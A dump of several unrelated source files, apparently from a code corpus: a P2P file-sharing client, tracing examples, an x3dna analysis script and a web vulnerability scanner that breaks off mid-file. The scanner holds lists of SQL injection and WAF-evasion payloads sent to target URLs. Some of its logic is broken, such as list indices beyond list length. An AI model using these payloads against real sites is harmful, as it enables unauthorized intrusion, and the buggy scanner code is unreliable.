    if not xy_label:
        # a clean inset: no tick marks or labels
        axins.set_xticks([])
        axins.set_yticks([])
    return axins
# ======================== composition =========================
def pretty_up(ax):
    """Apply the default bold tick and label fonts to ax."""
    for styler in (set_tick_font, set_label_font):
        styler(ax)
| 2.40625 | 2 |
src/client/client.py | martingaston/bangbangnapster | 2 | 12769719 | <gh_stars>1-10
import socket
import socketserver
import struct
from src.client.name_generator import generate_username
from src.packet import Packet, read_packet
from src.packet_type import PacketType
from src.client.search_result import SearchResult
from pathlib import Path
from typing import Optional
import threading
from functools import partial
from hashlib import md5
# HOST, PORT = "ec2-52-56-46-175.eu-west-2.compute.amazonaws.com", 5000
class PeerServerHandler(socketserver.BaseRequestHandler):
    """Serve one file download to a connecting peer.

    Protocol: send b"1" to acknowledge the connection, read the requested
    filename, then stream the file from the local "shared" directory in
    1024-byte chunks.
    """

    def handle(self):
        self.request: socket.socket
        self.request.sendall(b"1")
        filename = self.request.recv(1024).decode("ascii")
        shared = Path("shared").resolve()
        path = (shared / filename).resolve()
        # SECURITY FIX: the filename comes from an untrusted peer -- refuse
        # any request that resolves outside the shared directory (e.g. a
        # "../../etc/passwd"-style traversal)
        if shared not in path.parents:
            return
        if path.exists():
            with open(path, "rb") as f:
                for chunk in iter(partial(f.read, 1024), b""):
                    self.request.sendall(chunk)
class PeerTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    # thread-per-connection TCP server; all behavior comes from the mixins
    pass
def peer_server(port=6699):
    """Run the peer file server forever on *port* (blocks the calling thread)."""
    server = PeerTCPServer(("", port), PeerServerHandler)
    with server:
        IP, PORT = server.server_address
        print(f"🤝 Peer server active on {IP}:{PORT}")
        server.serve_forever()
class Client:
    """Napster-style client: logs in, shares local mp3s, searches, downloads.

    A daemon thread serves this client's own shared files to other peers
    while the main thread talks to the central server over one TCP socket.
    """
    host: str  # central server hostname
    port: int  # central server port
    def __init__(self, host: str = "localhost", port: int = 5000):
        self.host = host
        self.port = port
    def start(self):
        """Connect to the server, log in, share files, and enter the menu."""
        # serve our own shared files to peers in the background
        x = threading.Thread(target=peer_server, daemon=True)
        x.start()
        # Create a socket (SOCK_STREAM means a TCP socket)
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            self.sock = sock
            sock.connect((self.host, self.port))
            motd = Path.cwd().joinpath("src", "client", "motd").read_text()
            print(motd)
            # login
            self._login()
            self._share_all_files()
            self._main_menu()
    def _login(self):
        """Send a login request with a random username; exit(1) on failure."""
        data = f'{generate_username()} nopass 6699 "bangbangnapster 0.1" 3'
        packet = Packet(PacketType.REGISTERED_LOGIN_REQUEST, data)
        self.sock.sendall(bytes(packet))
        logged_in = read_packet(self.sock)
        if logged_in.packet_type != PacketType.LOGIN_ACKNOWLEDGE:
            print("failed to login, exiting")
            exit(1)
    def _logout(self):
        """Unshare everything and terminate the process."""
        # raw packet: length 0, opcode 0x6E (unshare all files)
        unshare_all = b"\x00\x00\x6E\x00"
        self.sock.sendall(unshare_all)
        exit(0)
    def _share_all_files(self):
        """Register every mp3 in ./shared with the server's file index."""
        library = Path.cwd().joinpath("shared").glob("*.mp3")
        for mp3 in library:
            mp3_bytes = mp3.read_bytes()
            hash = md5(mp3_bytes).hexdigest()
            # fields: "filename" md5 size bitrate frequency duration
            # NOTE(review): bitrate/frequency/duration are hard-coded here
            packet = Packet(
                PacketType.ADD_A_FILE_TO_SHARED_FILE_INDEX,
                f'"{mp3.name}" {hash} {len(mp3_bytes)} 128 44100 60',
            )
            self.sock.sendall(bytes(packet))
    def _main_menu(self):
        """Top-level interactive menu.

        NOTE(review): the menus call back into each other rather than
        looping, so a long session grows the call stack.
        """
        print("Select an option:")
        print("1. Search for a file")
        print("2. Log out")
        selection = input(">>> ")
        if selection == "1":
            self._search_for_files()
        elif selection == "2":
            self._logout()
    def _search_for_files(self):
        """Prompt for a query and send a search request to the server."""
        print("What shall we search for?")
        selection = input(">>> ")
        # little-endian length, opcode 0xC8 (search), then the ASCII query
        search_request = (
            struct.pack("<H", len(selection))
            + b"\xC8\x00"
            + bytes(selection, encoding="ascii")
        )
        self.sock.sendall(search_request)
        self._get_search_results()
    def _get_search_results(self):
        """Collect result packets until the end-of-results notification."""
        results = []
        while True:
            packet = read_packet(self.sock)
            if packet.packet_type is PacketType.SEARCH_QUERY_RESULTS:
                results.append(SearchResult.from_bytes(packet.data))
            elif packet.packet_type is PacketType.SEARCH_QUERY_RESULTS_END_NOTIFICATION:
                break
            else:
                print("Server returned unexpected response. Whoops! Exiting.")
                self._logout()
        self._show_download_options(results)
    def _show_download_options(self, results):
        """Show up to 5 results and let the user pick one to download."""
        MAX_RESULTS = 5
        print("results:")
        for index, result in enumerate(results[:MAX_RESULTS]):
            print(f"{index}. {result}")
        print("5. Return to main menu")
        print("would you like to download any of these files?")
        res = input(">>> ")
        if res == "0" or res == "1" or res == "2" or res == "3" or res == "4":
            self._download(results[int(res)])
        if res == "5":
            self._main_menu()
    def _download(self, result: SearchResult):
        """Fetch the chosen file directly from the owning peer on port 6699."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.connect((str(result.ip), 6699))
            ack = sock.recv(1)
            if ack.decode("ascii") == "1":
                print(
                    f"☎️ connected to {result.ip}, attempting to download {result.filename}"
                )
                sock.send(bytes(result.filename.encode("ascii")))
                with open(f"shared/{result.filename}", "wb") as f:
                    while True:
                        received = sock.recv(1024)
                        if received == b"":
                            break  # peer closed the connection: EOF
                        f.write(received)
                print(
                    f"🎉 download of {result.filename} from {result.nick} ({result.size} bytes) complete"
                )
        self._main_menu()
    def _handle_packet(self, packet: Packet) -> Optional[Packet]:
        # NOTE(review): currently only logs search-related packets and never
        # produces a reply; appears to be a stub for future packet handling
        if packet.packet_type == PacketType.SEARCH_QUERY_RESULTS:
            print(packet)
            return None
        if packet.packet_type == PacketType.SEARCH_QUERY_RESULTS_END_NOTIFICATION:
            print("end of search results")
            return None
        return None
| 2.953125 | 3 |
examples/wipac_tracing/span_multithreaded_multiproccessed.py | WIPACrepo/wipac-telemetry-prototype | 0 | 12769720 | <reponame>WIPACrepo/wipac-telemetry-prototype
"""Examples for spanned() decorator with multi-threaded/processed tracing."""
# pylint: disable=protected-access
import logging
import os
import sys
import time
from concurrent.futures import (
Future,
ProcessPoolExecutor,
ThreadPoolExecutor,
as_completed,
)
from typing import Any, Dict, List
import coloredlogs # type: ignore[import]
# the script imports wipac_telemetry from the repo root, so insist on running
# from there and put the repo root on sys.path
if "examples" not in os.listdir():
    raise RuntimeError("Script needs to be ran from root of repository.")
sys.path.append(".")
import wipac_telemetry.tracing_tools as wtt # noqa: E402 # pylint: disable=C0413,E0401
########################################################################################
@wtt.spanned()
def example_00_threads_incorrect(n_threads: int) -> None:
    """Run multiple independent threads, INCORRECTLY.
    Spanning an in-thread function will not inherit ANYTHING. The
    resulting span is completely not related in any way to the
    *intended* parent.
    Don't do this!
    """
    outter_span = wtt.get_current_span()

    # no context is propagated into the pool thread, so the new span ends up
    # parentless even though this function's span is still active
    @wtt.spanned(all_args=True)
    def thread_work(worker: int) -> int:
        """Do thread's work."""
        assert outter_span.is_recording()  # surprising? this is b/c of shared memory
        assert wtt.get_current_span().is_recording()  # as expected
        assert outter_span != wtt.get_current_span()  # good
        assert not wtt.get_current_span()._parent  # NOT GOOD!
        # # # #
        time.sleep(1)
        return worker

    futures: List[Future] = []  # type: ignore[type-arg]
    with ThreadPoolExecutor() as pool:
        for i in range(n_threads):
            futures.append(pool.submit(thread_work, i))
    for worker in as_completed(futures):
        ret = worker.result()
        print(f"Returned Worker #{ret}")
@wtt.spanned()
def example_01_threads_incorrect(n_threads: int) -> None:
    """Run multiple independent threads, INCORRECTLY.
    A non-spanned in-thread function won't be spanned by its *intended*
    parent.
    Don't do this!
    """
    outter_span = wtt.get_current_span()

    # the carrier is passed in but never extracted inside the thread, so it
    # has no effect: the thread runs with no recording span at all
    def thread_work(worker: int, carrier: Dict[str, Any]) -> int:
        """Do thread's work."""
        assert outter_span.is_recording()  # surprising? this is b/c of shared memory
        assert not wtt.get_current_span().is_recording()  # BAD!
        assert outter_span != wtt.get_current_span()  # good
        # assert wtt.get_current_span()._parent  # (n/a b/c not recording)
        # # # #
        print(carrier)
        time.sleep(1)
        # shared memory allows this -- but not a great idea logically...
        outter_span.add_event("I'm", {"A": "Thread"})
        return worker

    futures: List[Future] = []  # type: ignore[type-arg]
    with ThreadPoolExecutor() as pool:
        for i in range(n_threads):
            carrier = wtt.inject_span_carrier()
            print(carrier)
            futures.append(pool.submit(thread_work, i, carrier))
    for worker in as_completed(futures):
        ret = worker.result()
        wtt.add_event("Worker Join", {"worker-id": ret, "type": "thread"})
        print(f"Returned Worker #{ret}")
@wtt.spanned()
def example_02_threads_incorrect(n_threads: int) -> None:
    """Run multiple independent threads, INCORRECTLY.
    A re-spanned in-thread function may work, but is NOT SAFE. There's a
    race condition: a parent process/thread may end the span before the
    child thread uses it, or visa-versa. It's not a good idea.
    Don't do this!
    """
    outter_span = wtt.get_current_span()

    # even with `wtt.SpanBehavior.DONT_END`, this isn't a good idea
    @wtt.respanned("span", wtt.SpanBehavior.END_ON_EXIT)
    def thread_work(worker: int, span: wtt.Span) -> int:
        """Do thread's work."""
        # here the thread re-uses the parent's span object directly
        assert span == outter_span == wtt.get_current_span()
        assert outter_span.is_recording()  # sure
        assert wtt.get_current_span().is_recording()  # as expected
        assert outter_span == wtt.get_current_span()  # as expected
        assert not wtt.get_current_span()._parent
        # # # #
        # print(carrier)
        time.sleep(1)
        # shared memory allows this -- but not a great idea logically...
        outter_span.add_event("I'm", {"A": "Thread"})
        return worker

    futures: List[Future] = []  # type: ignore[type-arg]
    with ThreadPoolExecutor() as pool:
        for i in range(n_threads):
            # carrier = wtt.inject_span_carrier()
            # print(carrier)
            futures.append(pool.submit(thread_work, i, outter_span))
    for worker in as_completed(futures):
        ret = worker.result()
        wtt.add_event("Worker Join", {"worker-id": ret, "type": "thread"})
        print(f"Returned Worker #{ret}")
########################################################################################
@wtt.spanned()
def example_10_threads(n_threads: int) -> None:
    """Run multiple independent threads, with a common carrier."""
    outter_span = wtt.get_current_span()

    # the carrier propagates the span context across the thread boundary, so
    # each thread's span correctly gets this function's span as its parent
    @wtt.spanned(all_args=True, carrier="carrier")
    def thread_work(worker: int, carrier: Dict[str, Any]) -> int:
        """Do thread's work."""
        assert outter_span.is_recording()  # surprising? this is b/c of shared memory
        assert wtt.get_current_span().is_recording()  # as expected
        assert outter_span != wtt.get_current_span()  # good
        assert wtt.get_current_span()._parent  # GREAT!
        # # # #
        print(carrier)
        time.sleep(1)
        return worker

    futures: List[Future] = []  # type: ignore[type-arg]
    with ThreadPoolExecutor() as pool:
        for i in range(n_threads):
            carrier = wtt.inject_span_carrier()
            print(carrier)
            futures.append(pool.submit(thread_work, i, carrier))
    for worker in as_completed(futures):
        ret = worker.result()
        wtt.add_event("Worker Join", {"worker-id": ret, "type": "thread"})
        print(f"Returned Worker #{ret}")
########################################################################################
# defined at module level (not nested) so ProcessPoolExecutor can pickle it
@wtt.spanned(all_args=True, carrier="carrier")
def process_work(worker: int, carrier: Dict[str, Any]) -> int:
    """Do child process's work."""
    print(carrier)
    time.sleep(1)
    return worker
@wtt.spanned()
def example_20_processes(n_threads: int) -> None:
    """Run multiple independent process, with a common carrier."""
    futures: List[Future] = []  # type: ignore[type-arg]
    with ProcessPoolExecutor() as pool:
        for i in range(n_threads):
            # the carrier (a plain dict) is picklable, so it crosses the
            # process boundary and links the child span to this one
            carrier = wtt.inject_span_carrier()
            print(carrier)
            futures.append(pool.submit(process_work, i, carrier))
    for worker in as_completed(futures):
        ret = worker.result()
        wtt.add_event("Worker Join", {"worker-id": ret, "type": "process"})
        print(f"Returned Worker #{ret}")
########################################################################################
if __name__ == "__main__":
    coloredlogs.install(level="DEBUG")
    # run each example with 3 workers
    # MULTI-THREADING
    logging.warning("EXAMPLE #00 - Threaded Incorrectly")
    example_00_threads_incorrect(3)
    logging.warning("EXAMPLE #01 - Threaded Incorrectly")
    example_01_threads_incorrect(3)
    logging.warning("EXAMPLE #02 - Threaded Incorrectly")
    example_02_threads_incorrect(3)
    logging.warning("EXAMPLE #10 - Threaded with Carrier")
    example_10_threads(3)
    # MULTI-PROCESSING
    logging.warning("EXAMPLE #20 - Processes with Carrier")
    example_20_processes(3)
    # At this point you may be wondering,
    # "Well what happens if I use 'respanned' with multi-processing?"
    # Bad things, bad things will happen: inconsistent sem-lock
    # errors/timeouts, hanging processes, etc.
| 2.015625 | 2 |
knowledge_graph/crawler/text_crawler/text_crawler/spiders/xywy/__init__.py | Syhen/knowledge-graph | 2 | 12769721 | <reponame>Syhen/knowledge-graph
# -*- coding: utf-8 -*-
"""
Author: @heyao
Created On: 2019/6/24 下午1:57
"""
| 0.667969 | 1 |
wikimedia_thumbor/error_handlers/logstash/__init__.py | wikimedia/operations-software-thumbor-plugins | 2 | 12769722 | from .logstash import ErrorHandler
__all__ = ['ErrorHandler']
| 1.15625 | 1 |
strucpara/processing.py | alayah2626517/strucpara | 0 | 12769723 | <gh_stars>0
from os import path, system
from io import StringIO
import pandas as pd
from strucpara.miscell import check_dir_exist_and_make
ensemble_exec = '/home/yizaochen/opt/x3dna-v2.3/bin/x3dna_ensemble'
class BasePairAgent:
    """Extract base-pair parameters from an x3dna ensemble output file.

    Workflow: download the ensemble.out from the server, run
    `x3dna_ensemble extract` per parameter, then convert the tab-separated
    results into CSV files with a Frame-ID + per-base-pair header.
    """
    def __init__(self, rootfolder, host, time_interval):
        self.rootfolder = rootfolder
        self.type_na = 'bdna+bdna'
        self.n_bp = 13  # number of base pairs in the duplex
        self.host = host
        self.time_interval = time_interval
        self.host_folder = path.join(rootfolder, host)
        self.host_time_folder = path.join(self.host_folder, time_interval)
        self.check_folder()
        self.ensemble_out = path.join(self.host_time_folder, f'{self.type_na}.ensemble.out')
        self.server_root = '/home/yizaochen/x3dna/paper_2021'
        self.host_time_server = path.join(self.server_root, host, time_interval)
        self.ensemble_out_server = path.join(self.host_time_server, f'{self.type_na}.ensemble.out')
        # the six base-pair parameters; subclasses override this list
        self.parameters = ['shear', 'buckle', 'stretch', 'propeller', 'stagger', 'opening']
    def check_folder(self):
        """Create the host and host/time folders if they do not exist."""
        for folder in [self.host_folder, self.host_time_folder]:
            check_dir_exist_and_make(folder)
    def download_ensesmble_out(self, serverip):
        """Print (not run) the scp command to fetch ensemble.out from the server."""
        print('Please excute the following in the terminal:')
        cmd = f'scp yizaochen@{serverip}:{self.ensemble_out_server} {self.ensemble_out}'
        print(cmd)
    def extract_parameters(self):
        """Run x3dna_ensemble extract for each parameter, writing .dat files."""
        for parameter in self.parameters:
            output_dat = path.join(self.host_time_folder, f'{parameter}.dat')
            cmd = f'{ensemble_exec} extract -f {self.ensemble_out} -p {parameter} -o {output_dat}'
            system(cmd)
            print(cmd)
    def convert_dat_to_csv(self):
        """Prepend a header row to each extracted file and save it as CSV."""
        for parameter in self.parameters:
            # NOTE(review): this reads '{parameter}.out' while
            # extract_parameters writes '{parameter}.dat' -- confirm which
            # extension the x3dna tool actually produces
            dat_in = path.join(self.host_time_folder, f'{parameter}.out')
            f = open(dat_in, 'r')
            lines = f.readlines()
            f.close()
            first_line = self.get_first_line()
            lines = first_line + lines
            buffer = StringIO(''.join(lines))
            df = pd.read_csv(buffer, sep="\t")
            csv_out = path.join(self.host_time_folder, f'{parameter}.csv')
            df.to_csv(csv_out, index=False)
            print(f'Dataframe to csv: {csv_out}')
    def get_first_line(self):
        """Header row: Frame-ID plus one column per base pair (bp1..bpN)."""
        result = ['Frame-ID']
        for bp_id in range(1, self.n_bp+1):
            if bp_id == self.n_bp:
                result.append(f'bp{bp_id}\n')  # newline terminates the header
            else:
                result.append(f'bp{bp_id}')
        return ['\t'.join(result)]
    def clean_dat_files(self):
        """Print (not run) the rm command that deletes intermediate .dat files."""
        cmd = f'rm {self.host_time_folder}/*.dat'
        print("Please execute the following on Terminal:")
        print(cmd)
class BaseStepAgent(BasePairAgent):
    """Extract base-step parameters (shift/tilt/slide/roll/rise/twist)."""

    def __init__(self, rootfolder, host, time_interval):
        super().__init__(rootfolder, host, time_interval)
        self.parameters = ['shift', 'tilt', 'slide', 'roll', 'rise', 'twist']

    def get_first_line(self):
        """Header row: Frame-ID plus one bpN_bpN+1 column per base step."""
        labels = ['Frame-ID']
        # n_bp base pairs give n_bp - 1 steps; the last label ends the header
        labels.extend(f'bp{i}_bp{i + 1}' for i in range(1, self.n_bp - 1))
        labels.append(f'bp{self.n_bp - 1}_bp{self.n_bp}\n')
        return ['\t'.join(labels)]
class GrooveAgent(BasePairAgent):
    """Extract groove-width parameters from the x3dna ensemble output."""

    def __init__(self, rootfolder, host, time_interval):
        super().__init__(rootfolder, host, time_interval)
        self.parameters = ['major_gw_pp', 'major_gw_refined', 'minor_gw_pp', 'minor_gw_refined']

    def get_first_line(self):
        """Header row: Frame-ID plus label1..label(n_bp-1)."""
        labels = ['Frame-ID']
        # one label per base step; the last one terminates the header line
        labels.extend(f'label{i}' for i in range(1, self.n_bp - 1))
        labels.append(f'label{self.n_bp - 1}\n')
        return ['\t'.join(labels)]
vul_module.py | KirieHaruna/web_scanner | 0 | 12769724 | <reponame>KirieHaruna/web_scanner
# coding:utf8
import mysql
import requests
import urllib.parse
from urllib.parse import quote as urlencode
from urllib.parse import unquote as urldecode
import hashlib
import sys
import re
import urllib.parse
import threading
import dbms as dbms
from config import *
import imp
import DOM
import random
imp.reload(sys)
# sys.setdefaultencoding( "utf-8" )
# HTTP proxy used for routing probes (currently unused by the scan methods)
PROXY = {
    "http": "http://127.0.0.1:1080"
}
# request headers sent with every probe (browser-like UA)
HEADER = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0'
}
COOKIE = {}
# NOTE(review): module-level file handle opened in 'w' mode and never closed
# in this module -- confirm it is flushed/closed elsewhere before relying on it
vul_file = open('vulfile.txt', 'w')
def md5_encrypt(str):
    """Return the hex MD5 digest of the given text (UTF-8 encoded)."""
    return hashlib.md5(str.encode(encoding='utf-8')).hexdigest()
class vul_module(threading.Thread):
    def __init__(self, url, logfile):
        """Scanner thread for one target URL (injection point at URL end)."""
        threading.Thread.__init__(self)
        self.url = url
        self.sql_errors = []  # compiled (regex, dbms) pairs; see Get_sql_errors()
        self.logfile = logfile
    def Integer_sqlinj_scan(self):
        """Probe for numeric SQL injection.

        Fetches url, url+'+1' and url+'+1-1'. If the original and the
        '+1-1' responses match while '+1' differs (by MD5 of the body or
        by DOM structure), the parameter is likely evaluated as a SQL
        expression; return the URL, else 0.
        """
        try:
            res_md5_1 = md5_encrypt(requests.get(url=self.url, headers=HEADER).text)
            res_md5_2 = md5_encrypt(requests.get(url=self.url + urlencode('+1'), headers=HEADER).text)
            res_md5_3 = md5_encrypt(requests.get(url=self.url + urlencode('+1-1'), headers=HEADER).text)
            res_DOM_1 = DOM.check(self.url)
            res_DOM_2 = DOM.check(self.url + urlencode('+1'))
            res_DOM_3 = DOM.check(self.url + urlencode('+1-1'))
        except Exception as e:
            print(e)
            # NOTE(review): the res_DOM_* names stay unbound when the request
            # fails, so the comparison below can raise NameError -- confirm
            res_md5_1 = res_md5_2 = res_md5_3 = 0
            pass
        if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or ((res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2):
            return self.url
        return 0
def Str_sqlinj_scan(self, waf):
quotes = ['\'', '"', '']
payload_0 = [" and 0;-- ",
"/**/and/**/0;#",
"\tand\t0;#",
"\nand/**/0;#",
"\'-\'",
"\' \'",
"\'&\'",
"\'^\'",
"\'*\'",
"\' or \'\'-\'",
"\' or \'\' \'",
"\' or \'\'&\'",
"\' or \'\'^\'",
"\' or \'\'*\'",
"\"-\"",
"\" \"",
"\"&\"",
"\"^\"",
"\"*\"",
"\" or \"\"-\"",
"\" or \"\" \"",
"\" or \"\"&\"",
"\" or \"\"^\"",
"\" or \"\"*\"",
"or true--",
"\" or true--",
"\' or true--",
"\") or true--",
"\') or true--",
"\' or \'x\'=\'x",
"\') or (\'x\')=(\'x",
"\')) or ((\'x\'))=((\'x",
"\" or \"x\"=\"x",
"\") or (\"x\")=(\"x",
"\")) or ((\"x\"))=((\"x",
"or 1=1",
"or 1=1--",
"or 1=1#",
"or 1=1/*",
"admin\' --",
"admin\' #",
"admin\'/*",
"admin\' or \'1\'=\'1",
"admin\' or \'1\'=\'1\'--",
"admin\' or \'1\'=\'1\'#",
"admin\' or \'1\'=\'1\'/*",
"admin\'or 1=1 or \'\'=\'",
"admin\' or 1=1",
"admin\' or 1=1--",
"admin\' or 1=1#",
"admin\' or 1=1/*",
"admin\') or (\'1\'=\'1",
"admin\') or (\'1\'=\'1\'--",
"admin\') or (\'1\'=\'1\'#",
"admin\') or (\'1\'=\'1\'/*",
"admin\') or \'1\'=\'1",
"admin\') or \'1\'=\'1\'--",
"admin\') or \'1\'=\'1\'#",
"admin\') or \'1\'=\'1\'/*",
"1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
"admin\" --",
"admin\" #",
"admin\"/*",
"admin\" or \"1\"=\"1",
"admin\" or \"1\"=\"1\"--",
"admin\" or \"1\"=\"1\"#",
"admin\" or \"1\"=\"1\"/*",
"admin\"or 1=1 or \"\"=\"",
"admin\" or 1=1",
"admin\" or 1=1--",
"admin\" or 1=1#",
"admin\" or 1=1/*",
"admin\") or (\"1\"=\"1",
"admin\") or (\"1\"=\"1\"--",
"admin\") or (\"1\"=\"1\"#",
"admin\") or (\"1\"=\"1\"/*",
"admin\") or \"1\"=\"1",
"admin\") or \"1\"=\"1\"--",
"admin\") or \"1\"=\"1\"#",
"admin\") or \"1\"=\"1\"/*",
"1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed05\"",
" UNION ALL SELECT 1,2,3,4",
" UNION ALL SELECT 1,2,3,4,5-- ",
" UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
" UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
" AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
" UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
" RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
]
payload_1 = [" and 1;-- ",
"/**/and/**/1;#",
"\tand\t1;#",
"\nand/**/1;#",
"\'-\'",
"\' \'",
"\'&\'",
"\'^\'",
"\'*\'",
"\' or \'\'-\'",
"\' or \'\' \'",
"\' or \'\'&\'",
"\' or \'\'^\'",
"\' or \'\'*\'",
"\"-\"",
"\" \"",
"\"&\"",
"\"^\"",
"\"*\"",
"\" or \"\"-\"",
"\" or \"\" \"",
"\" or \"\"&\"",
"\" or \"\"^\"",
"\" or \"\"*\"",
"or true--",
"\" or true--",
"\' or true--",
"\") or true--",
"\') or true--",
"\' or \'x\'=\'x",
"\') or (\'x\')=(\'x",
"\')) or ((\'x\'))=((\'x",
"\" or \"x\"=\"x",
"\") or (\"x\")=(\"x",
"\")) or ((\"x\"))=((\"x",
"or 1=1",
"or 1=1--",
"or 1=1#",
"or 1=1/*",
"admin\' --",
"admin\' #",
"admin\'/*",
"admin\' or \'1\'=\'1",
"admin\' or \'1\'=\'1\'--",
"admin\' or \'1\'=\'1\'#",
"admin\' or \'1\'=\'1\'/*",
"admin\'or 1=1 or \'\'=\'",
"admin\' or 1=1",
"admin\' or 1=1--",
"admin\' or 1=1#",
"admin\' or 1=1/*",
"admin\') or (\'1\'=\'1",
"admin\') or (\'1\'=\'1\'--",
"admin\') or (\'1\'=\'1\'#",
"admin\') or (\'1\'=\'1\'/*",
"admin\') or \'1\'=\'1",
"admin\') or \'1\'=\'1\'--",
"admin\') or \'1\'=\'1\'#",
"admin\') or \'1\'=\'1\'/*",
"1234 \' AND 1=0 UNION ALL SELECT \'admin\', \'81dc9bdb52d04dc20036dbd8313ed055",
"admin\" --",
"admin\" #",
"admin\"/*",
"admin\" or \"1\"=\"1",
"admin\" or \"1\"=\"1\"--",
"admin\" or \"1\"=\"1\"#",
"admin\" or \"1\"=\"1\"/*",
"admin\"or 1=1 or \"\"=\"",
"admin\" or 1=1",
"admin\" or 1=1--",
"admin\" or 1=1#",
"admin\" or 1=1/*",
"admin\") or (\"1\"=\"1",
"admin\") or (\"1\"=\"1\"--",
"admin\") or (\"1\"=\"1\"#",
"admin\") or (\"1\"=\"1\"/*",
"admin\") or \"1\"=\"1",
"admin\") or \"1\"=\"1\"--",
"admin\") or \"1\"=\"1\"#",
"admin\") or \"1\"=\"1\"/*",
"1234 \" AND 1=0 UNION ALL SELECT \""
" UNION ALL SELECT 1,2,3,4",
" UNION ALL SELECT 1,2,3,4,5-- ",
" UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5",
" UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- ",
" AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- ",
" UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5--",
" RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='",
]
payload_3 = [" And 0;-- ",
"/**/And/**/0;#",
"\tAnd\t0;#",
"\nAnd/**/0;#",
" Union All Select 1,2,3,4",
" Union All Select 1,2,3,4,5-- ",
" Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
" Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
" And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
" Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
" Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
" And%200;--",
" Union%20All%20Select%201,2,3,4",
" Union%20All%20Select%201,2,3,4,5--",
" Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
" Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
" And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
" Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
" Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
" chr(97)+chr(110)+chr(100) 0;-- ",
" aandNandd 0;-- ",
]
payload_4 = [" And 0;-- ",
"/**/And/**/0;#",
"\tAnd\t0;#",
"\nAnd/**/0;#",
" Union All Select 1,2,3,4",
" Union All Select 1,2,3,4,5-- ",
" Union All Select @@version,sleep(5),user(),benchmark(1000000,md5('A')),5",
" Union All Select @@version,user(),sleep(5),benchmark(1000000,md5('A')),null,null,null-- ",
" And 5650=CONVERT(int,(Union all selectchar(88)+char(88)+char(88)))-- ",
" Union All Select 'inj'||'ect'||'xxx',2,3,4,5--",
" Rlike (Select (case when (4346=4346) then 0x61646d696e else 0x28 end)) and 'Txws'='",
" And%200;--",
" Union%20All%20Select%201,2,3,4",
" Union%20All%20Select%201,2,3,4,5--",
" Union%20All%20Select%20@@version,sleep(5),user(),benchmark(1000000,md5(%27A%27)),5",
" Union%20All%20Select%20@@version,user(),sleep(5),benchmark(1000000,md5(%27A%27)),null,null,null--",
" And%205650=CONVERT(int,(Union%20all%20selectchar(88)+char(88)+char(88)))--",
" Union%20All%20Select%20%27inj%27||%27ect%27||%27xxx%27,2,3,4,5--",
" Rlike%20(Select%20(case%20when%20(4346=4346)%20then%200x61646d696e%20else%200x28%20end))%20and%20%27Txws%27=%27",
" chr(97)+chr(110)+chr(100) 0;-- ",
" aandNandd 0;-- ",
]
for i in quotes:
for j in range(10):
if waf.cget("text") == 'WAF:None':
p0 = i + payload_0[random.randint(0,85)]
p1 = i + payload_1[random.randint(0,85)]
else:
p0 = i + payload_3[random.randint(0,85)]
p1 = i + payload_4[random.randint(0,85)]
try:
res_md5_1 = md5_encrypt(requests.get(url=self.url, headers=HEADER).text)
res_md5_2 = md5_encrypt(requests.get(url=self.url + urlencode(p0), headers=HEADER).text)
res_md5_3 = md5_encrypt(requests.get(url=self.url + urlencode(p1), headers=HEADER).text)
res_DOM_1 = DOM.check(self.url)
res_DOM_2 = DOM.check(self.url + urlencode(p0))
res_DOM_3 = DOM.check(self.url + urlencode(p1))
except Exception as e:
print(e)
res_md5_1 = res_md5_2 = res_md5_3 = 0
pass
if (res_DOM_1 == res_DOM_3 and res_DOM_1 != res_DOM_2) or ((res_md5_1 == res_md5_3) and res_md5_1 != res_md5_2):
return p0 + "~" + self.url
return 0
def Sql_error_scan(self):
'''
This method searches for SQL errors in html's.
@parameter response: The HTTP response object
@return: A list of errors found on the page
'''
r1 = requests.get(url=self.url, headers=HEADER)
r2 = requests.get(url=self.url + urlencode('\''), headers=HEADER)
res = []
for sql_regex, dbms_type in self.Get_sql_errors():
match1 = sql_regex.search(r1.text)
match2 = sql_regex.search(r2.text)
if match2 and not match1:
msg = 'A SQL error was found in the response supplied by the web application,'
msg += match2.group(0) + '". The error was found '
# res.append( (sql_regex, match.group(0), dbms_type) )
return self.url
return 0
def Xss_scan(self):
